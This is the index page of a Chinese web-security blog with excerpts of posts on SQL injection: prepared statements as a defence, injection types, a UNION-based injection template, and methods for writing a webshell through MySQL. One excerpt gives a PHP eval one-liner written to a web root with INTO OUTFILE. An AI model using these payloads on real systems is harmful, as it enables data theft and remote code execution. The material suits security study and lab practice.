avatar
文章
24
标签
32
分类
4
首页
归档
分类
标签
Payload库
关于
Echoin 的博客
搜索
首页
归档
分类
标签
Payload库
关于

Echoin 的博客

SQL 预编译及绕过
发表于2026-08-14|Web安全
预编译与sql注入,正则回溯绕过,mysql常见绕过,报错注入7大常用函数 - 技术栈 预编译的基础原理与作用1. 为什么预编译能防御SQL注入?假设有一个使用SQL预编译的查询语句: 12345String query = "SELECT * FROM users WHERE username = ? AND password = ?";PreparedStatement pstmt = connection.prepareStatement(query);pstmt.setString(1, username);pstmt.setString(2, password);ResultSet rs = pstmt.executeQuery(); 在这个示例中,查询语句中的参数使用了占位符,即“?”号,而不是将参数直接拼接到SQL语句中。这可以有效地防止SQL注入攻击。 SQL注入的核心原因在于:数据库将用户的输入当成了可执行的SQL代码的一部分。 普通查询:直接拼接字符串。如果用户输入 1 union select...,数据库会将其解析为两条指令。 预编译...
SQL 注入的原理及测试
发表于2026-08-14|Web安全
SQL 注入原理:SQL 注入的本质是代码与数据未分离。当用户可控的输入被直接拼接到 SQL 语句中执行时,攻击者可以通过构造恶意输入改变原有 SQL 的逻辑,从而执行非预期的数据库操作。 产生条件有两个: 用户可控:输入参数用户可以控制 拼接执行:输入被直接拼接到 SQL 语句中并执行 SQL注入的检测与攻击技术:检测思路: 先寻找注入点 → 判断字段数 → 逐步查询数据库名、表名、列名,最终获取敏感数据。 常见攻击类型: 中文名 原理 利用条件 联合查询注入 利用 union 联合查询拼接结果 页面有回显位 报错注入 利用数据库函数的报错信息回显数据 页面显示数据库报错 布尔盲注 基于页面真假变化逐位猜解数据 页面有布尔状态变化 时间盲注 利用 sleep 等函数的执行时间差猜解 页面无任何回显 堆叠注入 堆叠执行多条 SQL 语句 后端支持多语句执行 SQL注入的防御方法: 预编译(参数化查询):最有效的防御手段,使用 ? 占位符绑定变量,攻击者无法改变 SQL 结构。 使用存储过程:将 SQL 逻辑封装在存储过程中,但存储过程内部如果拼...
SQL 注入类型
发表于2026-08-14|Web安全
1. 数字型注入原理:参数为数字直接拼 SQL,无引号包裹,输入 ' 直接报错。 代码特征:参数直接拼接,无任何引号包裹。 1$sql = "SELECT * FROM users WHERE id = ".$_GET['id']; 危险函数: 123mysqli_query($conn, $sql) // MySQLi 过程化$pdo->query($sql) // PDOmysql_query($sql) // 老版本 MySQL 扩展 注入模板123456789101112131415161718192021222324-- ① 判断列数?id=1 order by 3--+-- ② 判断回显位?id=-1 union select 1,2,3--+-- ③ 查库名?id=-1 union select 1,database(),3--+-- ④ 查表名?id=-1 union select 1,group_concat(table_name),3 from inf...
SQL 注入写 shell
发表于2026-08-14|Web安全
通过 MySQL 写入 WebShell 是一种常见的安全测试技术,通常需要特定权限和配置。 方法 1:使用 OUTFILE 写入 Shell原理:把 SELECT 查询结果写入文件。 条件: 数据库用户具有 FILE 权限。 知道目标网站的绝对路径,并且该路径具有写入权限。 secure_file_priv 参数未限制写入路径。 执行以下 SQL 语句,将一句话木马写入文件: 1SELECT '<?php @eval($_POST["cmd"]); ?>' INTO OUTFILE 'C:/phpStudy/WWW/shell.php'; 验证文件是否成功写入,并通过 Web 访问测试。 注意:OUTFILE 会在每行末尾添加换行符,适合写文本文件。 如果路径受限,可尝试修改 MySQL 配置文件中的 secure_file_priv 参数。 方法 2:利用全局日志写入 Shell原理:开启 MySQL 通用日志(general log),把日志文件路径改成网站目录下的 .php,然后执行一句带木马的 ...
123
avatar
Echoin
Web安全 · 渗透测试 · CTF · 靶场
文章
24
标签
32
分类
4
Follow Me
公告
欢迎来到我的安全博客,一起学习 Web 安全与渗透测试!
最新文章
mlops - URL解析差异SSRF + hardlink恢复缺陷 + 配置文件注入2026-08-14
go to php - HTTP 请求走私2026-08-14
存储型 XSS 注入 + Admin Bot 提权 + XSS 外带2026-08-14
HTB NanoCorp 靶场 Writeup2026-08-14
HTB Garfield 靶场 Writeup2026-08-14
分类
  • CTF wp3
  • Web安全7
  • 渗透测试4
  • 靶场10
标签
Admin Bot WingData hardlink 跨站脚本 SQL注入 DevArea SSRF Dante XSS 红队 预编译 Three NanoCorp 域渗透 内网渗透 getshell NTLM Relay HTTP请求走私 Kerberoasting HTB Bronze Bit 服务端请求伪造 AS-REP Roasting Garfield CTF Fires Facts 靶场 Kerberos Conversor 内网 Kobold
归档
  • 八月 2026 24
网站信息
文章数目 :
24
本站总字数 :
52.2k
本站访客数 :
本站总浏览量 :
最后更新时间 :
© 2026 By Echoin框架 Hexo 8.1.2|主题 Butterfly 5.7.0
搜索
数据加载中